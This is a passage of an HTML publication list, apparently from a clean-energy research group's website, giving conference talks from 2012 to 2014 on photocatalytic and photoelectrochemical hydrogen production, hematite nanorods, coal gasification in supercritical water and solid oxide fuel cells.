the way to complete gasification of coal</strong>”, International Conference on Clean
Energy
(ICCE2014), Istanbul, Turkey, June 2014
</li>
<li>
<strong><u>B. Wang</u></strong>, <strong>S.H. Shen</strong>, <strong>L.J. Guo</strong>,
“<strong>Facile synthesis of high-indexed SrTiO<sub>3</sub> single-crystal photocatalysts
for
photocatalytic H<sub>2</sub> and O<sub>2</sub> evolution</strong>”, International
Conference
on Clean Energy (ICCE2014), Istanbul, Turkey, June 2014
</li>
<li>
<strong><u>X.J. Guan</u></strong>, <strong>L.J. Guo</strong>, “<strong>Synthesis and
characterization of SrTiO<sub>3</sub>/Ag<sub>3</sub>PO<sub>4</sub> composite for efficient
photocatalytic O<sub>2</sub> evolution under visible-light irradiation</strong>”,
International Conference on Clean Energy (ICCE2014), Istanbul, Turkey, June 2014
</li>
<li>
<strong><u>X.X. Wang</u></strong>, <strong>J. Chen</strong>, <strong>X.J. Guan</strong>,
<strong>L.J.
Guo</strong>, “<strong>Enhanced efficiency and stability for visible light driven
water
splitting hydrogen production over
Cd<sub>0.5</sub>Zn<sub>0.5</sub>S/g-C<sub>3</sub>N<sub>4</sub>
composite photocatalyst</strong>”, International Conference on Clean Energy (ICCE2014),
Istanbul, Turkey, June 2014
</li>
<li>
<strong><u>J. Chen</u></strong>, <strong>Y.C. Du</strong>, <strong>S.H. Shen</strong>, <strong>L.J.
Guo</strong>, “<strong>Distance modulated plasmonic enhancement in visible light
photocatalytic activity for hydrogen evolution over Ag@SiO<sub>2</sub> modified
g-C<sub>3</sub>N<sub>4</sub></strong>”, International Conference on Clean Energy
(ICCE2014),
Istanbul, Turkey, June 2014
</li>
<li>
<strong><u>J. Wang</u></strong>, <strong>N. Zhang</strong>, <strong>L.J. Guo</strong>,
“<strong>Facile synthesis of highly monodisperse α-Fe<sub>2</sub>O<sub>3</sub> quantum
dots
for Water Oxidation</strong>”, International Conference on Clean Energy (ICCE2014),
Istanbul,
Turkey, June 2014
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong class="invited_cited_blue">Invited talk & Session chair</strong>)</span>,
“<strong>Confinement effects for efficient solar water splitting</strong>”,
7<sup>th</sup>
International Conference on Energy Materials Nanotechnology, Beijing, China, May 2014
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Engineered
Impurity Distribution in ZnO Nanorod Arrays for Photoanodic Water Oxidation</strong>”,
2014
EMN East Meeting, Beijing, China, May 2014
</li>
<li><strong>L. Vayssieres </strong><span class="invited">(<strong class="invited_cited_blue">Invited talk & Session chair</strong>)</span>,
“<strong>Quantum-confined oxide heteronanostructures by aqueous design</strong>”,
2014
MRS Spring Meeting, Symposium RR: Solution Synthesis of Inorganic Functional Materials, San
Francisco, CA, USA, April 2014
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong
class="invited_cited_blue">Invited</strong>)</span>, “<strong>Low-cost oxide
heteronanostructures for solar water splitting</strong>”, UNESCO International Workshop on
Materials & Technologies for Energy Conversion, Saving & Storage, Montreal, Quebec,
Canada,
April 2014
</li>
<li>
<strong>L. Vayssieres</strong><span class="invited"> (<strong class="invited_cited_blue">Invited talk & Session chair</strong>)</span>,
“<strong>Low cost quantum-confined oxide heteronanostructures</strong>”, Nano &
Giga
Challenges in Electronics, Photonics and Renewable Energy: From Materials to Devices to System
Architecture, Phoenix, AZ, March 2014
</li>
<li>
<strong><u>S.H. Shen</u></strong><span class="invited"> (<strong
class="invited_cited_blue">Invited</strong>)</span>, <strong>M. Wang</strong>,
“<strong>Doping
to metal oxide nanorod arrays: Engineered electronic property and band structure for improved
photoanodic performances</strong>”, 247<sup>th</sup> ACS National Meeting &
Exposition,
Symposium on Nanostructured Materials for Solar Energy Conversion and Storage, Dallas, USA,
March
2014
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Doping
to ZnO nanorod arrays by ion implantation method: Engineered band structure and visible light
photoelectrochemical water splitting</strong>”, 2014 EMN Spring Meeting, Las Vegas, NV,
February-March 2014
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong class="invited_cited_blue">Invited talk & Session chair</strong>)</span>,
“<strong>Advances in quantum confinement effects and interfacial electronic structure for
solar water splitting</strong>”, American Ceramic Society Materials Challenges in
Alternative
& Renewable Energy 2014 Conference, Clearwater, FL, February 2014
</li>
<li>
<strong>L. Vayssieres </strong><span
class="invited">(<strong>Plenary Lecture & Session chair</strong>)</span>,
“<strong>All-Oxide Heteronanostructures For Solar Hydrogen Generation</strong>”,
Molecules and Materials for Artificial Photosynthesis Fusion Conference, Cancun, Mexico,
February
2014
</li>
<li>
<strong>L.J. Guo</strong> <span class="invited">(<strong>Invited</strong>)</span>, “<strong>The
progress in theoretical and experimental investigation of ‘boiling coal in supercritical water
to
H<sub>2</sub> and Pure CO<sub>2</sub>’ technology</strong>”, Asian Pacific Conference on Energy
and
Environmental Materials (APCEEM), Gold Coast, Queensland, Australia, February 2014
</li>
<li>
<strong><u>M.C. Liu</u> </strong><span class="invited">(<strong>Invited</strong>)</span>,
<strong>L.J.
Guo</strong>, “<strong>Solar hydrogen: harvesting light and heat from sun</strong>”, 6<sup>th</sup>
Sino-Thai Workshop on Renewable Energy, Guangzhou, China, January 27-30, 2014
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong
class="invited_cited_blue">Invited</strong>)</span>, “<strong>Doped and Core/shell
Structured Hematite Nanorods for Efficient Solar Water Splitting</strong>”,
38<sup>th</sup> International
Conference and Exposition on Advanced Ceramics and Composites, Symposium 7: 8<sup>th</sup> International
Symposium on Nanostructured Materials and Nanocomposites, Daytona Beach, FL, USA, January 2014
</li>
</ol>
<h5 align="center" class="h5" style="margin-top:15px; margin-bottom:0px;">2013 (46)</h5>
<ol style="list-style-type:decimal; margin: 30px; padding:30px 10px;" reversed start="96">
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong class="blue_color">Invited
talk & Session chair</strong>)</span>, “<strong>Aqueous chemical growth of advanced
heteronanostructures</strong>”, 12<sup>th</sup> International Conference
on Frontiers of Polymers & Advanced Materials, Auckland, New Zealand, December
2013
</li>
<li>
<strong><u>S.H. Shen</u></strong> <span class="invited">(<strong
class="invited_cited_blue">Invited</strong>)</span>, <strong>L.J. Guo</strong>, S. S. Mao,
“<strong>Solution-based hematite nanorods with ultrathin overlayer for efficient
photoelectrochemical water splitting</strong>”, 2013 MRS Fall Meeting & Exhibit,
Symposium
Z: Sustainable Solar-Energy Conversion Using Earth-Abundant Materials, Boston, USA, December
2013
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong
class="blue_color">Invited</strong>)</span>,
“<strong>Advanced Low cost Heteronanostructures for Solar Water Splitting</strong>”,
Swedish-Chinese Workshop on Renewable Energy: From Fundamentals to Applications,
Uppsala University, Uppsala, Sweden, November 2013
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong
class="blue_color">Invited</strong>)</span>, “<strong>All-oxide
quantum-confined heteronanostructures</strong>”, 2<sup>nd</sup> General Meeting
of the European Cooperation in Science & Technology, Chemistry and Molecular
Sciences and Technologies on Reducible Oxide Chemistry, Structure &
Functions, Uppsala University, Angstrom Laboratory, Siegbahn Hall, Uppsala, Sweden,
November 2013
</li>
<li>
<strong><u>J.N. Chen</u></strong>,<strong> M. Wang</strong>,<strong> S.H. Shen</strong>,<strong>
L.J.
Guo</strong>, “<strong>Au@SiO<sub>2</sub> core/shell nanoparticles decorated
TiO<sub>2</sub>
nanorod arrays for enhanced photoelectrochemical water splitting</strong>”, The
18<sup>th</sup> International Conference on Semiconductor Photocatalysis and Solar Energy
Conversion
(SPASEC-18), San Diego, California, USA, November 2013
</li>
<li>
<strong><u>S.H. Shen</u></strong>, <strong>J. Chen</strong>,<strong> X.X. Wang</strong>,<strong>
L.J. Guo</strong>, “<strong>Visible Light Activation of MCM-41 Mesoporous Silica by
Transition-Metal Incorporation for Photocatalytic Hydrogen Production</strong>”, The
18<sup>th</sup> International Conference on Semiconductor Photocatalysis and Solar Energy
Conversion
(SPASEC-18), San Diego, California, USA, November 2013
</li>
<li>
<strong><u>J.Z. Su</u></strong>, <strong>L. Wang</strong>,<strong> L.J. Guo</strong>,
“<strong>Enhanced Photoelectrochemical Water Splitting Using
BiVO<sub>4</sub>/CeO<sub>2</sub>
Nanostructural Heterojunction</strong>”, The 18<sup>th</sup> International Conference on
Semiconductor Photocatalysis And Solar Energy Conversion (SPASEC-18), San Diego, California,
USA,
November 2013
</li>
<li>
<strong><u>R. Xie</u></strong>, <strong>J.Z. Su</strong>, <strong>L.J. Guo</strong>,
“<strong>Optical,
Structural and Photoelectrochemical Properties of Ag<sub>2</sub>S Modified CdS Nanorods
Arrays</strong>”, The 18<sup>th</sup> International Conference on Semiconductor
Photocatalysis
And Solar Energy Conversion (SPASEC-18), San Diego, California, USA, November 2013<br>
</li>
<li>
<strong><u>Y.M. Fu</u></strong>, <strong>S.H. Shen</strong>,<strong> L.J. Guo</strong>,
“<strong>Enhanced Photoelectrochemical Performance of Nb-doped Hematite
(α-Fe<sub>2</sub>O<sub>3</sub>) Nanorods Photoanodes for Water Splitting</strong>”, The
18<sup>th</sup> International Conference on Semiconductor Photocatalysis and Solar Energy
Conversion
(SPASEC-18), San Diego, California, USA, November 2013
</li>
<li>
<strong><u>Y. Liu</u></strong>, <strong>M. Wang</strong>, <strong>L.J. Guo</strong>, <strong>M.T.
Li</strong>, “<strong>Preparation of CdSe/TiO<sub>2</sub> Nanofibers Films and Their
Photo-electrochemical Properties for Water Splitting Application</strong>”, The
18<sup>th</sup>
International Conference on Semiconductor Photocatalysis and Solar Energy Conversion
(SPASEC-18),
San Diego, California, USA, November 2013<br>
</li>
<li>
<u><strong>H. Liu</strong></u>,<strong> L.J. Guo</strong>, “<strong>Novel Quantum Yield
Measurement System for Photocatalytic Reaction</strong>”, The 18<sup>th</sup>
International
Conference on Semiconductor Photocatalysis and Solar Energy Conversion (SPASEC-18), San Diego,
California, USA, November 2013
</li>
<li>
<strong><u>L. Cai</u></strong>, <strong>S.H. Shen</strong>, <strong>L.J. Guo</strong>,
“<strong>Synthesis and Photoelectrochemical Properties of Ag@SiO<sub>2</sub>-ZnO Nanowire
Array Film</strong>”, The 18<sup>th</sup> International Conference on Semiconductor
Photocatalysis and Solar Energy Conversion (SPASEC-18), San Diego, California, USA, November
2013
</li>
<li>
<strong><u>P.H. Guo</u></strong>, <strong>S.H. Shen</strong>, <strong>L.J. Guo</strong>,
“<strong>Doped ZnO Homojunction for Promoted Photoelectrochemical Water Splitting under
Visible Light</strong>”, The 18<sup>th</sup> International Conference on Semiconductor
Photocatalysis and Solar Energy Conversion (SPASEC-18), San Diego, California, USA, November
2013
</li>
<li>
<strong><u>X.K. Wan</u></strong>, <strong>M. Wang</strong>, <strong>L.J. Guo</strong>,
“<strong>Heterojunction CdSe/BiVO<sub>4</sub> Films for Photoelectrochemical Water
Splitting</strong>”, The 18<sup>th</sup> International Conference on Semiconductor
Photocatalysis and Solar Energy Conversion (SPASEC-18), San Diego, California, USA, November
2013
</li>
<li>
<strong><u>D.W. Jing</u></strong>, <strong>L.Z. Zhang</strong>, X.D Yao, <strong>L.J.
Guo</strong>,
“<strong>In-Situ Photochemical Synthesis of Zn Doped Cu<sub>2</sub>O Hollow Nanocubes for
High
Efficient H<sub>2</sub> Production by Photocatalytic Reforming of Glucose under Visible
Light</strong>”, The 18<sup>th</sup> International Conference on Semiconductor
Photocatalysis
and Solar Energy Conversion (SPASEC-18), San Diego, California, USA, November 2013
</li>
<li>
<strong><u>M.T. Li</u></strong>,<strong> L.J. Guo</strong>, “<strong>A First Principles
Study
on Bi<sub>2</sub>Mo<sub>1-x</sub>W<sub>x</sub>O<sub>6</sub> for Photocatalytic Water Splitting
Application</strong>”, The 18<sup>th</sup> International Conference on Semiconductor
Photocatalysis and Solar Energy Conversion (SPASEC-18), San Diego, California, USA, November
2013
</li>
<li>
<strong>L. Vayssieres<span class="invited"> </span></strong><span class="invited">(<strong
class="blue_color">Invited</strong>)</span>,“<strong>Visible light-active
quantum-confined
all-oxide heteronanostructures</strong>”,2013 Materials Science & Technology
Conference
(MS&T), Symposium on Optical Nanomaterials for Photonics/Biophotonics, Montreal, Quebec,
Canada,
October 2013
</li>
<li>
<u><strong>J.W. Shi</strong></u>, <strong>L.J. Guo</strong>, “<strong>Design and
structure-activity relationships of novel ABO<sub>3</sub> structure-based visible-light-driven
photocatalysts</strong>”, Materials Science & Technology 2013 Conference &
Exhibition,
Montreal, Quebec, Canada, October 2013
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong
class="invited_cited_blue">Invited</strong>)</span>, “<strong>Metal Oxide or Metal
Nanodots Decorated g-C<sub>3</sub>N<sub>4</sub> for Efficient Photocatalytic Hydrogen
Production</strong>”, Materials Science & Technology 2013 Conference & Exhibition,
Montreal, Quebec, Canada, October 2013
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong
class="invited_cited_blue">Keynote</strong>)</span>, “<strong>Core/Shell Structured
Hematite Nanorod Arrays as Photoanodes for Efficient Solar Water Oxidation</strong>”,
IUPAC
9th International Conference on Novel Materials and their Synthesis (NMS-IX) & 23rd
International Symposium on Fine Chemistry and Functional Polymers (FCFP-XXIII), Shanghai, China,
October 2013
</li>
<li>
<strong>J.Z. Su </strong><span class="invited">(<strong
class="invited_cited_blue">Invited</strong>)</span>,
“<strong>WO<sub>3</sub>-based nano-wire arrays heterojunction and their
photoelectrochemical
hydrogen production performance</strong>”, 14<sup>th</sup> National Youth Science and
Technology Materials Seminar, Shenyang, China, October 2013
</li>
<li>
<strong><u>M.C. Liu</u></strong> <span class="invited">(<strong
class="invited_cited_blue">Invited</strong>)</span>, <strong>D.W. Jing</strong>, <strong>Z.H.
Zhou</strong>, <strong>L.J. Guo</strong>, “<strong>Twin-induced homojunctions for efficient
solar
hydrogen generation</strong>”, 4<sup>th</sup> China-Australia Symposium for Materials Science,
Zhuhai, China, October 20-24, 2013
</li>
<li>
<strong>I. Zegkinoglou</strong>, “<strong>New Materials for Solar Energy Conversion:
Interface
Studies with Soft X-Ray Spectroscopy</strong>”, 2013 Advanced Light Source User Meeting,
Workshop on Soft X-Ray Spectroscopy of Heterogeneous Interface, Lawrence Berkeley National
Laboratory, Berkeley, CA, October 2013
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong
class="blue_color">Invited</strong>)</span>,“<strong>All-oxide Quantum-confined
Hetero-Nanostructures for Solar Hydrogen Generation by Water Splitting</strong>”,
3<sup>rd </sup>Annual World Congress of Nano Science & Technology, Symposium on
Nanotechnology
in Energy & Environment, Qujiang International Conference Center, Xi'an, China, September
2013
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong class="blue_color">Keynote lecture & Session chair</strong>)</span>,
“<strong>Quantum-confined oxide heteronanostructures for solar hydrogen
generation</strong>”,
1<sup>st</sup> International Workshop on Nanotechnology, Renewable Energy & Sustainability
(NRES), Xi’an, China, September 2013
</li>
<li>
<strong>Q.Y. Chen</strong>, “<strong>Electricity and Hydrogen Co-production from A
Bio-Electrochemical Cell with Acetate Substrate</strong>”, 3<sup>rd</sup> New Energy
Forum-2013 with the theme of “From Green Dream to Reality”, Xi'an, China, September
2013
</li>
<li>
<strong>D.W. Jing </strong><span class="invited">(<strong
class="invited_cited_blue">Invited</strong>)</span>, “<strong>Experimental and
numerical
study on the solar photocatalytic hydrogen production reactor</strong>”, 3<sup>rd</sup>
New
Energy Forum-2013, Xi’an, China, September 2013
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong
class="invited_cited_blue">Invited</strong>)</span>, “<strong>Doped Hematite
Nanostructures for Solar Water Oxidation</strong>”, Workshop on “Alternative Energy
Solutions and Sustainable Growth”, New Delhi, India, September 2013
</li>
<li>
<u><strong>Y.M. Fu</strong></u>,<strong> L. Zhao</strong>, <strong>S.H. Shen</strong>,
“<strong>Enhancement of Photoelectrochemical Performance by Doping Tantalum Ions in
Hematite
(α-Fe<sub>2</sub>O<sub>3</sub>) Nanorod Photoanodes</strong>”, International Conference on
Nanoscience & Technology, Beijing, China, September 2013
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong class="blue_color">Keynote
lecture & Session chair</strong>)</span>, “<strong>Quantum-confined oxide
heteronanostructures
for solar hydrogen generation</strong>”, 8<sup>th</sup> International
Conference on High Temperature Ceramic Matrix Composites, Symposium S3 on Nanocomposite Materials
& Systems, Xi'an, China, September 2013
</li>
<li>
<strong><u>J.W. Shi</u></strong>, <strong>L.J. Guo</strong>, “<strong>Novel
ABO<sub>3</sub>-based
photocatalysts for visible-light-driven water splitting</strong>”, 8<sup>th</sup>
International Conference on High Temperature Ceramic Matrix Composites (HTCMC-8), Xi'an, China,
September 2013
</li>
<li>
<strong><u>J.Z. Su</u></strong>, <strong>L.J. Guo</strong>, “<strong>Different Metal
Element
Doped Hematites and Their Electronic Characterizations for Solar Water Splitting
Application</strong>”, 8<sup>th</sup> International Conference on High Temperature Ceramic
Matrix Composites (HTCMC-8), Xi'an, China, September 2013
</li>
<li>
<strong>S.H. Shen</strong>, “<strong>Metal oxide QDs enabled efficient photocatalytic
hydrogen
generation over g-C<sub>3</sub>N<sub>4</sub> under visible light</strong>”, 8<sup>th</sup>
International Conference on High Temperature Ceramic Matrix Composites (HTCMC-8), Xi'an, China,
September 2013
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong class="blue_color">Invited talk & Session chair</strong>)</span>,
“<strong>On quantum confinement effects in large bandgap semiconductors</strong>”, SPIE Optics
&
Photonics, Symposium on Solar Hydrogen & Nanotechnology VIII, San Diego, CA, August 2013
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong
class="blue_color">Invited</strong>)</span>, “<strong>Quantum-confined oxide
heteronanostructures for solar hydrogen generation</strong>”, 2013 CMOS Emerging Technologies
Research Symposium, Whistler, BC, Canada, July 2013
</li>
<li>
<strong>Q.Y. Chen</strong>, “<strong>TiO<sub>2</sub> photocathode coupling with bio-anode
for
electricity and hydrogen co-production</strong>”, 5<sup>th</sup> International Conference
on
Applied Energy, Pretoria, South Africa, July 2013
</li>
<li>
<strong>S.H. Shen</strong>, “<strong>Zr-doped α-Fe<sub>2</sub>O<sub>3</sub> photoanodes
for
efficient solar water splitting</strong>”, 11<sup>th</sup> International Conference on
Materials Chemistry (MC11), University of Warwick, UK, July 2013
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong
class="blue_color">Invited</strong>)</span>, “<strong>Quantum confinement and interfacial
electronic structure effects for efficient solar hydrogen generation</strong>”, 7<sup>th </sup>International
Conference on Materials for Advanced Technology (ICMAT), Symposium D on Nanostructure Materials
for
Solar Energy Conversion, Suntec, Singapore, June-July 2013
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong class="blue_color">Invited talk & Session chair</strong>)</span>,
“<strong>On quantum confinement effects and interfacial electronic structure engineering
for
efficient solar hydrogen generation</strong>”,10<sup>th</sup> PACRIM conference on
Ceramic & Glass Technology,<br>Symposium 7 on Multifunctional Metal Oxide Nanostructures and
Heteroarchitectures for Energy and Device Applications, San Diego, CA, USA, June 2013
</li>
<li>
<strong> <u>S.H. Shen</u></strong>, <strong>J. Chen</strong>, <strong>Z. Liu</strong>, <strong>L.J.
Guo</strong>, “<strong>Creating active sites in mesostructure of MCM-41 for efficient
photocatalytic hydrogen generation under visible light</strong>”, The 10<sup>th</sup>
Pacific
Rim Conference on Ceramic and Glass Technology including GOMD 2013 - Glass & Optical
Materials
Division Annual Meeting, San Diego, CA, USA, June 2013
</li>
<li>
<strong>J.J. Wei</strong>, “<strong>Selection of surface reflectivity for a solar cavity
receiver</strong>”, The Asian Symposium on Computational Heat Transfer and Fluid
Flow-2013,
Hong Kong, June 2013
</li>
<li>
<u><strong>I. Zegkinoglou</strong></u> <span class="invited">(<strong
class="blue_color">Invited</strong>)</span>,
C. X. Kronawitter, X. Feng, J.H. Guo, D. Wang, S. S. Mao, F. J.
Himpsel, <strong>L.Vayssieres</strong>, “<strong>Electronic Structure of Hematite
Photoanodes for Efficient Solar Water Splitting: A Soft X-Ray Spectroscopy Study</strong>”,
2013 Spring Meeting of the Materials Research Society (MRS), Symposium Z on Nanotechnology &
Sustainability, San Francisco, CA, USA, April 2013
</li>
<li>
<strong><u>S.H. Shen</u></strong> <span class="invited">(<strong
class="invited_cited_blue">Invited</strong>)</span>, <strong>J.G. Jiang</strong>, Coleman X.
Kronawitter,<strong> P.H. Guo</strong>, <strong>L.J. Guo</strong>, S. S. Mao,
“<strong>TiO<sub>2</sub> Modified α-Fe<sub>2</sub>O<sub>3</sub> Nanorod Arrays
for
Efficient Solar Water Splitting</strong>”, 2013 MRS Spring Meeting & Exhibit, YY:
Titanium
Dioxide-Fundamentals and Applications Symposium, San Francisco, CA, USA, April 2013
</li>
<li>
<strong><u>S.H. Shen</u></strong>, <strong>J.G. Jiang</strong>, <strong>P.H. Guo</strong>,
Coleman X.
Kronawitter, <strong>L.J. Guo</strong>, S. S. Mao, “<strong>Aqueous solution growth of
Pt-doped hematite photoanodes for efficient water splitting</strong>”, Colloids &
Energy
Conference 2013, Xiamen, China, April 2013
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong
class="invited_cited_blue">Invited</strong>)</span>, “<strong>Doped Hematite Nanorod
Arrays for Enhanced Solar Water Splitting</strong>”, NANOSMAT-Asia, Wuhan, China, March
2013
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong>Plenary</strong>)</span>,
“<strong>Quantum-confined
oxide heteronanostructures for solar hydrogen generation</strong>”, 6<sup>th </sup>International
Conference on Advanced Materials & Nanotechnology, Auckland, New Zealand, February 2013
</li>
</ol>
<h5 align="center" class="h5" style="margin-top:15px; margin-bottom:0px;">2012 (43)</h5>
<ol style="list-style-type:decimal; margin: 30px; padding:30px 10px;" reversed start="50">
<li>
<strong>E. Traversa </strong><span class="invited">(<strong
class="blue_color">Invited</strong>)</span>, “<strong>Towards the Next Generation of Solid
Oxide
Fuel Cells Operating at 600°C with Chemically Stable Proton Conducting Electrolytes</strong>”,
Symposium on Advanced Materials for Applications in Energy, Health, Electronics and Photonics,
Varennes, Quebec, Canada, November 30, 2012
</li>
<li>
<strong>E. Traversa</strong> <span class="invited">(<strong
class="blue_color">Invited</strong>)</span>, “<strong>Ionic Conductivity of Oxide Thin Films
and
Superlattices</strong>”, Materials Research Society Fall 2012 Meeting, Symposium F: Oxide
Thin
Films for Renewable Energy Applications/Symposium I: Functional Materials for Solid Oxide Fuel
Cells, Boston, MA, USA, November 25-30, 2012
</li>
<li>
<strong>B. Chen</strong> <span class="invited">(<strong
class="invited_cited_blue">Keynote</strong>)</span>,
“<strong>Doped Particle Semi-implicit Method Based on Large Eddy Simulation</strong>”,
The 4<sup>th</sup> International Conference on Computational Methods, Gold Coast, QLD,
Australia,
November 2012
</li>
<li>
<u>F. J. Himpsel</u> <span class="invited">(<strong>Invited</strong>)</span>, J. Guo, W.
Yang,
Z. Hussain, <strong>L. Vayssieres</strong>, “<strong>Using Spectroscopy for Designing
New
Types of Solar Cells</strong>”, 2012 X-ray Scattering Principal Investigators' Meeting,
Division of Materials Sciences & Engineering, Office of Basic Energy Sciences, U.S.
Department
of Energy, Washingtonian Marriott, Gaithersburg, MD, November 2012
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong class="blue_color">Keynote lecture & Session chair</strong>)</span>,
“<strong>All-oxide heteronanostructures for solar hydrogen generation</strong>”,
6<sup>th </sup>International
Workshop on Advanced Materials Science & Nanotechnology, Halong Bay, Vietnam,
October-November
2012
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong
class="blue_color">Plenary</strong>)</span>,“<strong>Low cost metal oxide
heteronanostructures for renewable energy</strong>”, The 12<sup>th </sup>International
Conference on Clean Energy (ICCE-2012), Xi’an, China, October 26-30, 2012
</li>
<li>
<strong> E. Traversa</strong> <span class="invited">(<strong
class="blue_color">Plenary</strong>)</span>,“<strong>Towards the Next Generation of
Solid
Oxide Fuel Cells Operating at 600°C with Chemically Stable Proton Conducting
Electrolytes</strong>”,
The 12<sup>th</sup> International Conference on Clean Energy (ICCE-2012), Xi’an, China,
October
26-30, 2012
</li>
<li>
<strong>L.J. Guo </strong><span class="invited">(<strong
class="blue_color">Plenary</strong>)</span>,“<strong>Boiling
Coal in Water</strong><strong>— H<sub>2</sub> production and power generation system with near
zero
CO<sub>2</sub> emission based coal and supercritical water gasification</strong>”, The
12<sup>th</sup>
International Conference on Clean Energy (ICCE-2012), Xi’an, China, October 26-30, 2012
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong
class="invited_cited_blue">Plenary</strong>)</span>, “<strong>Facile Aqueous Growth of
Hematite Photoanodes for Solar Water Splitting</strong>”, The 12<sup>th</sup>
International
Conference on Clean Energy (ICCE-2012), Xi’an, China, October 26-30, 2012
</li>
<li>
<strong>Q.Y. Chen</strong>, “<strong>Co-production of electricity and hydrogen from
microbial
fuel cell</strong>”, The 12<sup>th</sup> International Conference on Clean Energy
(ICCE-2012),
Xi'an, China, October 26-30, 2012
</li>
<li>
<strong><u>J. Chen</u></strong>, <strong>S.H. Shen</strong>, <strong>L.J. Guo</strong>,
“<strong>Enhanced photocatalytic hydrogen evolution over Cu-doped
g-C<sub>3</sub>N<sub>4</sub>
under visible light irradiation [C]</strong>”, The 12<sup>th</sup> International
Conference on
Clean Energy (ICCE-2012), Xi’an, China, October 26-30, 2012
</li>
<li>
<strong><u>P. Wu</u></strong>, <strong>J. Chen</strong>, <strong>L.J. Guo</strong>,
“<strong>Effect
of Silicon on Graphitic Carbon Nitride for Visible-light-Driven Photocatalytic Hydrogen
Evolution</strong>”, The 12<sup>th</sup> International Conference on Clean Energy
(ICCE-2012),
Xi’an, China, October 26-30, 2012
</li>
<li>
<strong> L. Vayssieres </strong><span class="invited">(<strong
class="blue_color">Keynote</strong>)</span>,“<strong>Aqueous
design of quantum-confined oxide heteronanostructures</strong>”, 8<sup>th</sup> IUPAC
International Conference on New Materials & their Synthesis, Xi’an, China, October
14-19,
2012
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong
class="blue_color">Invited</strong>)</span>,“<strong>All-oxide quantum-confined hetero
nanostructures for solar hydrogen generation</strong>”, 222<sup>nd</sup> ECS Fall Meeting,
Symposium B10: Renewable Fuels from Sunlight & Electricity, Honolulu, October 2012
</li>
<li>
<strong>E. Traversa</strong> <span class="invited">(<strong
class="blue_color">Plenary</strong>)</span>,“<strong>Towards the Next Generation of
Solid
Oxide Fuel Cells Operating at 600°C with Chemically Stable Proton Conducting
Electrolytes</strong>”,
Euro-mediterranean Hydrogen Technologies Conference-EmHyTeC 2012, Hammamet, Tunisia, September
11-14, 2012
</li>
<li>
<strong>J.Z. Su</strong> <span class="invited">(<strong>Invited</strong>)</span>,“<strong>Hydrogen
Production by Photocatalytic and Photoelectrochemical Methods</strong>”, Sino-German
Workshop
on Energy Research, Xi'an China, September 2012
</li>
<li>
<strong>H. Jin </strong><span class="invited">(<strong
class="invited_cited_blue">Invited</strong>)</span>,
“<strong>Hydrogen production by supercritical water gasification driven by concentrated
solar
energy</strong>”, Sino-German Workshop on Energy Research, Xi'an, China, September 2012
</li>
<li>
<strong>X.W. Hu </strong><span class="invited">(<strong
class="invited_cited_blue">Invited</strong>)</span>,
“<strong>Hydrogen Bubble during Photocatalysis</strong>”, Sino-German Workshop on
Energy
Research, Xi'an, China, September 2012
</li>
<li>
<strong>H. Jin </strong><span class="invited">(<strong
class="invited_cited_blue">Invited</strong>)</span>,
“<strong>Hydrogen production by supercritical water gasification</strong>”,
Sino-German
Workshop on Energy Research, Xi'an, China, September 2012
</li>
<li>
<strong>E. Traversa </strong><span
class="invited">(<strong>Invited</strong>)</span>,“<strong>Ionic
Conductivity of Oxide Thin Films and Superlattices</strong>”, XI International Conference
on
Nanostructured Materials NANO 2012, Rhodes, Greece, August 26-31, 2012
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong class="blue_color">Invited talk & Session chairs</strong>)</span>,
“<strong>All-oxide hetero nanostructures for direct solar water splitting</strong>”,
SPIE Optics & Photonics, Symposium on Solar Hydrogen & Nanotechnology VII, San Diego,
CA,
USA, August 11-16, 2012
</li>
<li>
<strong><u>J.Z. Su</u></strong>, <strong>L.J. Guo</strong>, “<strong>1D metal oxide
nanowire
array synthesis and photoelectrochemical application</strong>”, SPIE Optics &
Photonics,
Symposium on Solar Hydrogen & Nanotechnology VII, San Diego, CA, USA, August 11-16, 2012
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong
class="blue_color">Keynote</strong>)</span>,“<strong>All-oxide hetero nanostructures
for
solar water splitting</strong>”,244<sup>th</sup> American Chemical Society National
Meeting
& Exposition, 4<sup>th</sup> International Symposium on Hydrogen from Renewable Sources and
Refinery Applications, Philadelphia, PA, USA, August 2012
</li>
<li>
<strong>D.W. Jing </strong><span class="invited">(<strong
class="blue_color">Invited</strong>)</span>,“<strong>Photocatalytic Hydrogen
Production
under visible light over TiO<sub>2</sub> calcined in different Gas Atmospheres</strong>”,
XXI
International Materials Research Congress, Cancun, Mexico, August 2012
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong
class="blue_color">Invited</strong>)</span>,“<strong>Enhanced Performance for Water
Splitting over Ti-doped Hematite Photoanodes</strong>”, XXI International Materials
Research
Congress, Cancun, Mexico, August 2012
</li>
<li>
<strong><u>J.W. Shi</u></strong>, <strong>L.J. Guo</strong>, “<strong>Tin(II) antimonates
with
